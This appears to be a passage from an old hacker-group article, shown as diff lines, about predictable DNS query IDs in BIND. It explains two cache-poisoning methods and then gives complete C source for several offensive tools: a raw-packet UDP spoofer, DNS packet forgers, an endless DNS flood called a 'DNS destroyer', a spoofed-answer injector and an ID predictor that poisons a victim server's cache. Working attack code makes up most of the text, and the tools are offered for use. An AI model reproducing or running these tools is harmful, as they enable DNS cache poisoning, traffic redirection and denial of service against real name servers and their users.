+and "2" for the second question (if they are 2 questions at the same time).
+
+
+######################## BIND Vulnerability ##############################
+
+There is a vulnerability in BIND (discovered by SNI as stated earlier).
+In fact, DNS IS are easily predictable, you only have to sniff a DNS in
+order to do what you want. Let me explain...
+
+The DNS uses a random ID at the beginning but it only increase this ID for
+next questions ... =)))
+
+It's easy to exploit this vulnerability.
+Here is the way:
+
+1. Be able to sniff easily the messages that comes to a random DNS (ex.
+   ns.dede.com for this sample).
+
+2. You ask NS.victim.com to resolve (random).dede.com. NS.victim.com will
+   ask to ns.dede.com to resolve (random).dede.com
+
+   ns.victim.com ---> [?(rand).dede.com ID = 444] ---> ns.dede.com
+
+3. Now you have the ID of the message from NS.victim.com, now you know what
+   ID area you'll have to use. (ID = 444 in this sample).
+
+4. You then make your resolution request. ex. www.microsoft.com to
+   NS.victim.com
+   
+   (you) ---> [?www.microsoft.com] ---> ns.victim.com
+
+   ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com
+     
+5. Flood the name server ns.victim.com with the ID (444) you already have and
+   then you increase this one.
+
+ ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com
+ ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com
+ ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com
+ ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com
+ ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com
+ ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com
+
+
+(now you know that DNS IDs are predictable, and they only increase. You
+flood ns.victim.com with spoofed answers with the ID 444+ ;)
+
+*** ADMsnOOfID does this.
+
+
+There is another way to exploit this vulnerability without a root on
+any DNS
+
+The mechanism is very simple. Here is the explanation
+
+We send to ns.victim.com a resolution request for *.provnet.fr
+
+(you) ----------[?(random).provnet.fr] -------> ns.victim.com
+
+Then, ns.victim.com asks ns1.provnet.fr to resolve (random).provnet.fr.
+There is nothing new here, but the interesting part begins here.
+
+From this point you begin to flood ns.victim.com with spoofed answers
+(with ns1.provnet.fr IP) with ids from 100 to 110...
+
+(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com 
+(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com 
+(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com 
+(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com 
+.....
+
+After that, we ask ns.victim.com if (random).provnet.fr has an IP.
+
+If ns.victim.com give us an IP for (random).provnet.fr then we have
+found the correct ID :) Otherwise we have to repeat this attack until we
+find the ID. It's a bit long but it's effective. And nothing forbids you 
+to do this with friends ;)
+
+This is how ADMnOg00d works ;)
+
+-------------------------------
+
+
+
+########################################################################## 
+
+Here you will find 5 programs
+ADMkillDNS  - very simple DNS spoofer
+ADMsniffID  - sniff a LAN and reply false DNS answers before the NS
+ADMsnOOfID  - a DNS ID spoofer (you'll need to be root on a NS)
+ADMnOg00d   - a DNS ID predictor (no need to be root on a NS)
+ADNdnsfuckr - a very simple denial of service attack to disable DNS
+
+Have fun!! :)
+Note: You can find source and binaries of this progs at 
+ftp.janova.org/pub/ADM. I'm going to make a little HOWTO soon, which would
+be on janova. You need to install libpcap on your machine before any
+compilation of the ADMID proggies :)
+
+
+ADM Crew.
+
+Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love
+these guys)
+Special Thanks: ackboo, and of course Secure Networks, Inc. (SNI) at
+www.secnet.com for finding the vulnerability =)   
+
+<++> ADMIDpack/ADM-spoof.c
+/************************************************************************/
+/*  ADM spoofing  routine for spoof udp                                 */
+/************************************************************************/
+  
+#define IPHDRSIZE     sizeof(struct iphdr)
+#define UDPHDRSIZE    sizeof(struct udphdr)
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <memory.h>
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include "ip.h"
+#include "udp.h"
+
+
+/*****************************************************************************/
+/*
+ * in_cksum --
+ *  Checksum routine for Internet Protocol family headers (C Version)
+ */
+/*****************************************************************************/
+
+unsigned short in_cksum(addr, len)
+    u_short *addr;
+    int len;
+{
+    register int nleft = len;
+    register u_short *w = addr;
+    register int sum = 0;
+    u_short answer = 0;
+ 
+    /*
+     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
+     * sequential 16 bit words to it, and at the end, fold back all the
+     * carry bits from the top 16 bits into the lower 16 bits.
+     */
+    while (nleft > 1)  {
+        sum += *w++;
+        nleft -= 2;
+    }
+ 
+    /* mop up an odd byte, if necessary */
+    if (nleft == 1) {
+        *(u_char *)(&answer) = *(u_char *)w ;
+        sum += answer;
+    }
+ 
+    /* add back carry outs from top 16 bits to low 16 bits */
+    sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
+    sum += (sum >> 16);         /* add carry */
+    answer = ~sum;              /* truncate to 16 bits */
+    return(answer);
+
+}
+
+
+
+ int udp_send(s,saddr,daddr,sport,dport,datagram,datasize) 
+     
+     int s;
+     unsigned long  saddr;
+     unsigned long  daddr;
+     unsigned short sport;
+     unsigned short dport;
+     char           * datagram;
+     unsigned       datasize;
+{
+
+struct sockaddr_in sin;
+struct   iphdr   *ip;
+struct   udphdr  *udp;
+unsigned char    *data;
+unsigned char    packet[4024];
+int x;
+ 
+ip     = (struct iphdr     *)packet; 
+udp    = (struct udphdr    *)(packet+IPHDRSIZE);
+data   = (unsigned char    *)(packet+IPHDRSIZE+UDPHDRSIZE);
+       
+memset(packet,0,sizeof(packet));
+
+	udp->source  = htons(sport); 
+	udp->dest    = htons(dport);
+	udp->len     = htons(UDPHDRSIZE+datasize);
+	udp->check   = 0;         
+
+        memcpy(data,datagram,datasize);
+        
+        memset(packet,0,IPHDRSIZE);
+        
+        ip->saddr.s_addr  = saddr;
+        ip->daddr.s_addr  = daddr;
+        ip->version  = 4;
+        ip->ihl      = 5;
+        ip->ttl      = 245;
+        ip->id       = random()%5985;
+        ip->protocol = IPPROTO_UDP;
+        ip->tot_len  = htons(IPHDRSIZE + UDPHDRSIZE + datasize);
+        ip->check    = 0;
+        ip->check    = in_cksum((char *)packet,IPHDRSIZE);
+                                                                        
+                                                                        
+
+	sin.sin_family=AF_INET;
+	sin.sin_addr.s_addr=daddr;
+	sin.sin_port=udp->dest;
+	
+        x=sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0, 
+        		(struct sockaddr*)&sin, sizeof(struct sockaddr));
+
+
+return(x);
+}
+
+
+
+/*****************************************************************************/
+/*                     RECV PAKET                                            */
+/* get_pkt(socket, *buffer , size of the buffer);                            */
+/*****************************************************************************/
+
+int get_pkt(s,data,size)
+int s;
+unsigned char *data;
+int size;
+{
+ struct sockaddr_in sin;
+ int len,resu;
+ len= sizeof(sin);
+ resu=recvfrom(s,data,size,0,(struct sockaddr *)&sin,&len);
+ return resu;
+}        
+<-->
+<++> ADMIDpack/ADMDNS2.c
+/*************************************************/
+/*  DNS include for play with DNS packet (c) ADM */
+/*************************************************/
+
+#define   ERROR -1
+#define   DNSHDRSIZE 12
+#define   TYPE_A   1
+#define   TYPE_PTR 12
+
+
+int myrand()
+{
+ int j; 
+ j=1+(int) (150.0*rand()/(RAND_MAX+1.0));
+ return(j);
+}
+
+
+unsigned long  host2ip(char *serv)
+
+{
+  struct sockaddr_in sinn;
+  struct hostent *hent;
+      
+  hent=gethostbyname(serv);
+  if(hent == NULL) return 0;
+  bzero((char *)&sinn, sizeof(sinn));
+  bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
+  return sinn.sin_addr.s_addr;
+ }
+
+  
+
+void nameformat(char *name,char *QS)
+{
+/* CRAP & LAme COde :) */
+char lol[3000];
+char tmp[2550];
+char tmp2[2550];
+int  i,a=0;
+bzero(lol,sizeof(lol));
+bzero(tmp,sizeof(tmp));
+bzero(tmp2,sizeof(tmp2));
+
+
+
+  for(i=0;i<strlen(name);i++)
+     {
+      if( *(name+i) == '.'  ){
+          sprintf(tmp2,"%c%s",a,tmp);
+          strcat(lol,tmp2);
+          bzero(tmp,sizeof(tmp));
+          bzero(tmp2,sizeof(tmp2));
+          a=0;
+          } 
+       else  tmp[a++] = *(name+i);
+     }
+       
+ sprintf(tmp2,"%c%s",a,tmp);
+ strcat(lol,tmp2);
+ strcpy(QS,lol);
+ }     
+
+
+
+void nameformatIP(char *ip, char *resu)
+{
+char *arpa = "in-addr.arpa";
+char bla[255];
+char arf[255];
+char haha[255];
+char c;
+char *A[4];
+int i,a=3,k=0;
+
+bzero(bla,sizeof(bla));
+bzero(arf,sizeof(arf));
+bzero(haha,sizeof(haha));
+
+for(i=0;i<4;i++){
+  A[i] =(char *)malloc(4);
+  bzero(A[i],4);
+ }
+
+bzero(bla,sizeof(bla));
+bzero(arf,sizeof(arf));
+
+for(i=0;i<strlen(ip);i++)
+  {
+   c = ip[i];
+    if( c == '.'){
+     strcat(A[a],arf); 
+     a--;
+     k=0;
+     bzero(arf,sizeof(arf));
+     }
+   else arf[k++] = c;
+  }
+  
+  strcat(A[a],arf);
+  
+ for(i=0;i<4;i++){
+    strcat(bla,A[i]);
+    strcat(bla,".");
+    }
+     
+
+strcat(bla,arpa);
+nameformat(bla,haha);
+strcpy(resu,haha);
+}   
+
+
+
+int makepaketQS(char *data,char *name,int type)
+{
+
+if(type == TYPE_A ){
+   nameformat(name,data);
+   *( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_A);
+ }
+
+if(type == TYPE_PTR){
+   nameformatIP(name,data);
+   *( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_PTR);
+   }
+        
+   *( (u_short *) (data+strlen(data)+3) ) = htons(1); 
+   return(strlen(data)+5);   
+
+}
+
+
+int makepaketAW(char *data,char *name, char *ip,int type)
+{
+int i;
+char tmp[2550];
+bzero(tmp,sizeof(tmp));
+
+if( type == TYPE_A ){
+   nameformat(name,data);
+   *( (u_short *) (data+strlen(data)+1) ) = htons(1);
+   *( (u_short *) (data+strlen(data)+3) ) = htons(1);        
+   i=strlen(data)+5;
+   strcpy(data+i,data);
+   i=i+strlen(data)+1;    
+   *((u_short *) (data+i))      = htons(TYPE_A);
+   *((u_short *) (data+i+2))    = htons(1);
+   *((u_long *) (data+i+4))    = 9999999;
+   *((u_short *) (data+i+8))    = htons(4);
+   *((u_long *) (data+i+10))   = host2ip(ip);
+   return(i+14);
+  }
+
+if( type == TYPE_PTR ){
+   nameformat(name,tmp);
+   nameformatIP(ip,data);
+   *( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_PTR);
+   *( (u_short *) (data+strlen(data)+3) ) = htons(1);  
+   i=strlen(data)+5;
+   strcpy((data+i),data);
+   i=(i+strlen(data)+1);
+   *((u_short *) (data+i))     = htons(TYPE_PTR);
+   *((u_short *) (data+i+2))   = htons(1);
+   *((u_long *) (data+i+4))    = 9999999;
+   *((u_short *) (data+i+8))   = htons(strlen(tmp)+1);
+   strcpy((data+i+10),tmp);
+   return(i+10+strlen(tmp)+1);
+  }
+}
+
+void sendquestion(u_long s_ip, u_long d_ip,char *name,int type)
+{
+ struct dnshdr *dns;
+ char buff[1024];
+ char *data;
+ int i;
+ int on=1;
+ int sraw;
+
+if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
+   perror("socket");
+   exit(ERROR);
+   }
+   
+if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR)if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
+  perror("setsockopt");
+  exit(ERROR);
+  }
+
+dns  = (struct dnshdr *) buff;
+data = (char *)(buff+DNSHDRSIZE);
+
+bzero(buff,sizeof(buff));
+
+dns->id      = 6000+myrand();
+dns->qr      = 0;
+dns->rd      = 1;
+dns->aa      = 0;
+dns->que_num = htons(1);
+dns->rep_num = htons(0);
+i=makepaketQS(data,name,type);
+udp_send(sraw,s_ip,d_ip,1200+myrand,53,buff,DNSHDRSIZE+i);
+close(sraw);       
+}                                   
+
+void sendawnser(u_long s_ip, u_long d_ip, char *name,char *spoofip,int ID,int type)
+ {
+ struct dnshdr *dns;
+ char buff[1024];
+ char *data;
+ int i;
+ int on=1;
+ int sraw;
+ 
+if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
+   perror("socket");
+   exit(ERROR);
+   }
+   
+if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR)if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
+  perror("setsockopt");
+  exit(ERROR);
+  }
+
+dns  = (struct dnshdr *) buff;
+data = (char *)(buff+DNSHDRSIZE);
+
+bzero(buff,sizeof(buff));
+
+  dns->id      = htons(ID);
+  dns->qr      = 1;
+  dns->rd      = 1;
+  dns->aa      = 1;
+  dns->que_num = htons(1);
+  dns->rep_num = htons(1);
+  i=makepaketAW(data,name,spoofip,type);
+  printf(" I apres Makepaket == %i \n",i);
+  udp_send(sraw,s_ip,d_ip,53,53,buff,DNSHDRSIZE+i);
+  close(sraw);
+ }           
+                                     
+
+void dnsspoof(char *dnstrust,char *victim,char *spoofname,char *spoofip,int ID,int type)
+     {
+     struct dnshdr *dns;
+     char    buff[1024];
+     char    *data;
+     u_long fakeip;
+     u_long trustip;
+     u_long victimip;
+     int loop,rere;
+     
+     dns  = (struct dnshdr *)buff;
+     data = (char *)(buff+DNSHDRSIZE);
+     
+     
+     
+    trustip  = host2ip(dnstrust);
+    victimip = host2ip(victim); 
+    fakeip   = host2ip("12.1.1.0");
+    
+    /* send question ... */
+   if( type ==  TYPE_PTR) 
+     for(loop=0;loop<4;loop++)sendquestion(fakeip,victimip,spoofip,type);
+   
+   if( type == TYPE_A)
+     for(loop=0;loop<4;loop++)
+          sendquestion(fakeip,victimip,spoofname,type);
+         
+           
+           /* now its time to awnser Quickly !!! */ 
+     for(rere = 0; rere < 2;rere++){
+        for(loop=0;loop < 80;loop++){
+            printf("trustip %s,vitcimip %s,spoofna %s,spoofip %s,ID %i,type %i\n",
+                 dnstrust,victim,spoofname,spoofip,ID+loop,type); 
+          sendawnser(trustip,victimip,spoofname,spoofip,ID+loop,type);
+         }
+      }
+    
+    
+    }
+<-->
+<++> ADMIDpack/ADMdnsfuckr.c
+/*   ADM DNS DESTROYER  */
+
+
+#define  DNSHDRSIZE 12
+#define  VERSION    "0.2 pub"
+#define  ERROR  -1
+
+#include <stdio.h>
+#include <stdlib.h>      
+#include "ADM-spoof.c"
+#include "dns.h"
+#include "ADMDNS2.c"
+
+                     
+void main(int argc, char **argv)
+   {
+	 struct   dnshdr *dns;
+	 char            *data;
+         char            buffer2[4000];
+         unsigned char   namez[255];     
+	 unsigned long   s_ip;
+	 unsigned long   d_ip;                      
+	 int sraw,on=1;
+
+
+if(argc <2){printf(" usage : %s <host> \n",argv[0]); exit(0);}
+	
+ dns    = (struct dnshdr  *)buffer2;
+ data   = (char *)(buffer2+12);
+ bzero(buffer2,sizeof(buffer2));
+
+if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
+  perror("socket");
+  exit(ERROR);
+  }
+  
+ if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
+   perror("setsockopt");
+   exit(ERROR);
+   }
+
+printf("ADMdnsFuker %s  DNS DESTROYER  made by the ADM crew\n",VERSION);
+printf("(c) ADM,Heike vouais tous se ki est as moi est a elle aussi ...\n");
+sleep(1);
+
+s_ip=host2ip("100.1.2.3");
+d_ip=host2ip(argv[1]);
+
+    
+       
+       dns->id      = 123;
+       dns->rd      = 1;
+       dns->que_num = htons(1);
+      
+      while(1){            
+                           
+                  sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());        
+                  printf("%s\n",namez);
+                  strcpy(data,namez);
+                  *( (u_short *) (data+strlen(namez)+1) ) = ntohs(12);
+                  *( (u_short *) (data+strlen(namez)+3) ) = ntohs(1);
+                  udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
+                  s_ip=ntohl(s_ip);
+                  s_ip++;
+                  s_ip=htonl(s_ip);   
+              
+            }
+
+}
+<-->
+<++> ADMIDpack/ADMkillDNS.c
+
+#include "ADM-spoof.c"
+#include "dns.h"
+#include "ADMDNS2.c"
+
+#define   ERROR     -1
+#define   VERSION  "0.3 pub"
+#define   ID_START  1
+#define   ID_STOP   65535
+#define   PORT_START  53
+#define   PORT_STOP   54
+
+void main(int argc, char **argv)
+   {
+        
+	 struct   dnshdr *dns;
+	 char            *data;
+         char            buffer2[4000];
+         unsigned char   namez[255];    
+	 unsigned long   s_ip,s_ip2;
+	 unsigned long   d_ip,d_ip2;
+         int sraw, i, on=1, x, loop, idstart, idstop, portstart, portstop;
+
+
+if(argc <5){
+            system("/usr/bin/clear");
+            printf(" usage : %s <ip src> <ip dst>  <name> <ip>\n\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP] \n",argv[0]);
+            printf(" ip src: ip source of the dns anwser\n");
+            printf(" ip dst: ip of the dns victim\n");
+            printf(" name  : spoof name ex: www.dede.com\n");
+            printf(" ip    : the ip associate with the name\n");
+            printf(" options \n");
+            printf(" [A,B,N]   \n");
+            printf(" A: flood the DNS victim with multiple query\n");
+            printf(" B: DOS attack for destroy the DNS \n");
+            printf(" N: None attack \n\n");
+            printf(" [ID_START]            \n");
+            printf(" ID_START: id start :> \n\n");
+            printf(" [ID_STOP]             n");
+            printf(" ID_STOP : id stop :>  \n\n");
+            printf(" PORT START,PORT STOP: send the spoof to the portstart at portstop\n\n");
+            printf("\033[01mADMkillDNS %s (c) ADM\033[0m , Heike \n",VERSION);
+            exit(ERROR);
+            }
+ 
+ dns    = (struct dnshdr  *)buffer2;
+ data   = (char *)(buffer2+DNSHDRSIZE);
+ bzero(buffer2,sizeof(buffer2));
+ 
+if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
+   perror("socket");
+   exit(ERROR);
+   }
+   
+ 
+if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
+  perror("setsockopt");
+  exit(ERROR);
+  }
+ 
+ printf("ADMkillDNS %s",VERSION); 
+ printf("\nouais ben mwa je dedie ca a ma Heike");
+ printf("\nREADY FOR ACTION!\n"); 
+
+s_ip2=s_ip=host2ip(argv[1]);
+d_ip2=d_ip=host2ip(argv[2]);
+
+
+
+if(argc>5)if(*argv[5]=='A')
+ {
+  for(loop=0;loop<10;loop++){
+       dns->id      = 6000+loop;
+       dns->qr      = 0;
+       dns->rd      = 1;
+       dns->aa      = 0;
+       dns->que_num = htons(1);
+       dns->rep_num = htons(0);
+       i=makepaketQS(data,argv[3],TYPE_A); 
+       udp_send(sraw,s_ip,d_ip,1200+loop,53,buffer2,DNSHDRSIZE+i);         
+       s_ip=ntohl(s_ip);
+       s_ip++;
+       s_ip=htonl(s_ip);
+       
+       }
+   } /* end of DNS flood query */
+
+/* ici on trouve la routine contre un DOS */
+
+if(argc>5)if(*argv[5]=='B')
+  {
+  	  s_ip=host2ip("100.1.2.3");
+          dns->id      = 123;
+          dns->rd      = 1;
+          dns->que_num = htons(1);
+             
+     printf("plz enter the number of packet u wanna send\n");
+     scanf("%i",&i);         
+      for(x=0;x<i;x++){            
+                           
+                  sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());        
+                  strcpy(data,namez);
+                  *( (u_short *) (data+strlen(namez)+1) ) = ntohs(12);
+                  *( (u_short *) (data+strlen(namez)+3) ) = ntohs(1);
+                  udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
+                  s_ip=ntohl(s_ip);
+                  s_ip++;
+                  s_ip=htonl(s_ip);   
+                 printf("send packet num %i:%i\n",x,i);   
+            }
+      } /* end of DNS DOS */
+   
+ 
+if(argc > 6 )idstart = atoi(argv[6]);
+else
+  idstart = ID_START;
+if(argc > 7 )idstop  = atoi(argv[7]);
+else
+  idstop = ID_STOP;
+  
+if(argc > 8 ){
+  portstart = atoi(argv[8]);
+  portstop  = atoi(argv[9]);
+  }
+
+ else {
+   portstart = PORT_START;
+   portstop  = PORT_STOP;
+   }
+           
+
+bzero(buffer2,sizeof(buffer2));
+bzero(namez,sizeof(namez));
+i=0;
+x=0;
+s_ip=s_ip2;
+d_ip=d_ip2;
+
+
+ 
+    for(;idstart<idstop;idstart++){
+       dns->id      = htons(idstart);
+       dns->qr      = 1;
+       dns->rd      = 1;
+       dns->aa      = 1;
+       dns->que_num = htons(1);
+       dns->rep_num = htons(1);
+       printf("send awnser with id %i to port %i at port %i\n",idstart,portstart,portstop);                                          
+       i=makepaketAW(data,argv[3],argv[4],TYPE_A);
+       for(;x < portstop; x++)
+          udp_send(sraw,s_ip,d_ip,53,x,buffer2,DNSHDRSIZE+i);
+       x = portstart;
+      }  
+ 
+printf(" terminated..\n");
+}
+<-->
+<++> ADMIDpack/ADMnOg00d.c
+/***************************/
+/* ADMnog00d (c) ADM       */
+/***************************/
+/*  ADM DNS ID PREDICTOR   */
+/***************************/
+
+#include <fcntl.h>
+#include <unistd.h>           
+#include "dns.h"
+#include "ADM-spoof.c"
+#include "ADMDNS2.c"
+
+
+#define  VERSION "0.7 pub"
+#define  SPOOFIP "4.4.4.4"
+#define  ERROR  -1
+#define  LEN   sizeof(struct sockaddr)
+#define  UNDASPOOF "111.111.111.111"
+#define  TIMEOUT 300
+#define  DNSHDRSIZE 12
+
+void usage()
+{
+
+   printf(" ADMnoG00D <your ip> <dns trust> <domaine trust> <ip victim> <TYPE> <spoof name> <spoof ip> <ns.trust.for.the.spoof> [ID] \n"); 
+   printf("\n ex: ADMnoG00d ppp.evil.com ns1.victim.com provnet.fr ns.victim.com 1 mouhhahahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID] \n");
+   printf(" well... we going to poison ns.victime.com for they resolv mouhhahaha.hol.fr in 31.3.3.7\n");
+   printf(" we use provnet.fr and ns1.provnet for find ID of ns.victim.com\n");
+   printf(" we use ns.isdnet.net for spoof because they have auth on *.hol.fr\n");
+   printf(" for more information..\n");
+   printf(" check ftp.janova.org/pub/ADM/ \n");
+   printf(" mail  ADM@janova.org \n");
+   printf(" ask Heike from me...:) \n"); 
+   exit(-1); 
+}  
+
+void senddnspkt(s,d_ip,wwwname,ip,dns)
+int s;
+u_long d_ip;
+char *wwwname;
+char *ip;
+struct dnshdr *dns;
+{
+ struct sockaddr_in sin;
+ int  i;
+ char buffer[1024];
+ char *data = (char *)(buffer+DNSHDRSIZE);
+ bzero(buffer,sizeof(buffer));
+ memcpy(buffer,dns,DNSHDRSIZE);
+
+if(dns->qr == 0)
+  {
+   i=makepaketQS(data,wwwname,TYPE_A);
+   sin.sin_family = AF_INET;
+   sin.sin_port   = htons(53);
+   sin.sin_addr.s_addr = d_ip;
+   sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
+  }
+ 
+ else
+  {
+  i=makepaketAW(data,wwwname,ip,TYPE_A);
+  sin.sin_family = AF_INET;
+  sin.sin_port   = htons(53);
+  sin.sin_addr.s_addr = d_ip;
+  sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
+  }
+}
+                    
+ 
+  
+
+void dns_qs_no_rd(s,d_ip,wwwname,ID)
+int s;
+u_long d_ip;
+char *wwwname;
+int ID;
+{
+struct dnshdr *dns;
+char   *data;
+char   buffer[1024];
+int i;
+
+dns  = (struct dnshdr *)buffer;
+data = (char *)(buffer+DNSHDRSIZE);
+bzero(buffer,sizeof(buffer));
+
+       dns->id      = htons(ID);
+       dns->qr      = 0;
+       dns->rd      = 0; /* dont want the recusion !! */
+       dns->aa      = 0;
+       dns->que_num = htons(1);
+       dns->rep_num = htons(0);
+       i=makepaketQS(data,wwwname,TYPE_A);
+       senddnspkt(s,d_ip,wwwname,NULL,dns);
+}
+       
+    
+                                                                
+                     
+void main(int argc, char **argv)
+     {
+         struct   sockaddr_in sin_rcp;
+	 struct   dnshdr *dns,  *dns_recv;
+	 char            *data, *data2;
+         char            buffer2[4000];
+         char            buffer[4000];
+         char            spoofname[255];
+         char            spoofip[255];
+         char            dnstrust[255];
+         char            bla[255];
+         char            *alacon;
+         unsigned char   fakename[255];
+         unsigned char   namez[255];     
+	 unsigned long   s_ip,  s_ip2;
+	 unsigned long   d_ip,  d_ip2, trust;
+         unsigned int    DA_ID = 65535, loop = 65535;                      
+	          int    sraw, s_r, i, on=1, x, ID,timez;
+	          int    len = sizeof(struct sockaddr);
+ 
+ dns_recv = (struct dnshdr *)(buffer);
+ data2    = (char *)(buffer+DNSHDRSIZE);
+ dns      = (struct dnshdr *)buffer2;
+ data     = (char *)(buffer2+DNSHDRSIZE);
+ 
+ bzero(buffer2,sizeof(buffer2));
+ srand(time(NULL));
+        
+
+if( (s_r=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) == ERROR ){
+     perror("socket");
+     exit(ERROR);
+     }  
+
+ 
+  if( (fcntl(s_r,F_SETFL,O_NONBLOCK)) == ERROR ){
+     perror("fcntl");
+     exit(ERROR);
+     }      
+ 
+         
+if ((sraw = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR ){
+    perror("socket");
+    exit(ERROR);
+    }
+    
+if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR)){
+    perror("setsockopt");
+    exit(ERROR);
+    }
+ 
+ if(argc < 2) usage();
+ 
+ 
+ if(argc > 9 )DA_ID = loop = atoi(argv[9]);
+  
+if(argc > 6)strcpy(spoofname,argv[6]);
+ else{
+     printf("enter the name you wanna spoof:");
+     scanf("%s",spoofname);
+    }
+
+if(argc > 7)strcpy(bla,argv[7]);
+  else{
+     printf("enter the ip's  of the spoof name:");
+     scanf("%s",bla);
+    }
+  
+  alacon =(char *)inet_ntoa(host2ip(bla));
+  strcpy(spoofip,alacon);
+    
+    
+  
+  if( argc > 8 ) strcpy(bla,argv[8]);
+  else{
+      printf("enter the DNS trust of the victim:");
+       scanf("%s",bla);
+      }
+  
+  alacon =(char *)inet_ntoa(host2ip(bla));
+  strcpy(dnstrust,alacon);
+                       
+             
+ 
+ printf("ADMnoG00d %s\n",VERSION); 
+ printf("\033[1mHeike\033[0m ownz Me So g\033[5m\033[36m0\033[0m\033[1m0\033[0md\n");
+ sleep(1);
+ printf("\nLets Play =)!!\n");  
+
+/* save some param */ 
+s_ip2        = host2ip(argv[1]);
+d_ip2 = d_ip = host2ip(argv[4]);
+trust =        host2ip(argv[2]);
+s_ip         = host2ip(UNDASPOOF);
+
+
+while(1){
+
+      
+       sprintf(fakename,"%i%i%i%i%i%i.%s",
+               myrand(),
+               myrand(),
+               myrand(),
+               myrand(),
+               myrand(),
+               myrand(),
+               argv[3]);
+       
+     sendquestion(s_ip,d_ip,fakename,TYPE_A);
+       
+      
+    /* end of question packet */
+   
+
+    bzero(buffer2,sizeof(buffer2)); /* RE init some variable */
+    bzero(namez,sizeof(namez)); 
+    i=0; 
+    x=0;
+
+
+/* here  start the spoof anwser */
+
+ID = loop;
+
+for(;loop >= ID-10 ;loop--){
+       dns->id      = htons(loop);
+       dns->qr      = 1;
+       dns->rd      = 1;
+       dns->aa      = 1;
+       dns->que_num = htons(1);
+       dns->rep_num = htons(1);
+                                                 
+       i=makepaketAW(data,fakename,SPOOFIP,TYPE_A);
+       udp_send(sraw,trust,d_ip2,53,53,buffer2,DNSHDRSIZE+i);
+    }
+ 
+bzero(buffer2,sizeof(buffer2)); /* RE init some variable */
+bzero(namez,sizeof(namez));
+i=0;
+x=0;
+             
+ /* time for test spoof     */
+
+ dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); /* here we sending question */
+                                            /* non recursive ! */
+     
+ /* we waiting for awnser ... */
+     
+ while(1){    
+  for(timez=0;timez < TIMEOUT; timez++){
+     if( recvfrom(s_r,buffer,sizeof(buffer),0,(struct sockaddr *)&sin_rcp,&len) != -1 )
+       {
+        printf("ok whe have the reponse ;)\n");
+        timez = 0;
+        break;
+       }
+     usleep(10);
+     timez++;
+    }
+   if(timez != 0){
+     printf("hum no reponse from the NS ressend question..\n");
+     dns_qs_no_rd(s_r,d_ip2,fakename,myrand());
+     }
+   else break;
+ } 
+   /* ok we have a awnser */
+   printf("fakename = %s\n",fakename);
+       if(sin_rcp.sin_addr.s_addr ==  d_ip2 )
+          if(sin_rcp.sin_port == htons(53) )
+            {
+             if( dns_recv->qr == 1 )
+                if( dns_recv->rep_num == 0 ) /* hum we dont have found the right ID */                                              
+                       printf("try %i < ID < %i \n",ID-10,ID);
+         
+                    else{
+                     /* Hoho we have  the spoof has worked we have found the right ID ! */
+                     printf("the DNS ID of %s iz %i< ID <%i !!\n",argv[4],loop-10,loop);
+                     printf("let's send the spoof...\n");
+                     dnsspoof(dnstrust,argv[4],spoofname,spoofip,loop,atoi(argv[5]));          
+                     printf("spoof sended ...\n");
+                     exit(0);
+                     }                  
+              } /* end of if (sin_rcp.sin_port == htons(53) ) */
+      bzero(buffer,sizeof(buffer));    
+           
+  } /* end of while loop */ 
+
+}/* end of proggies */ 
+<-->
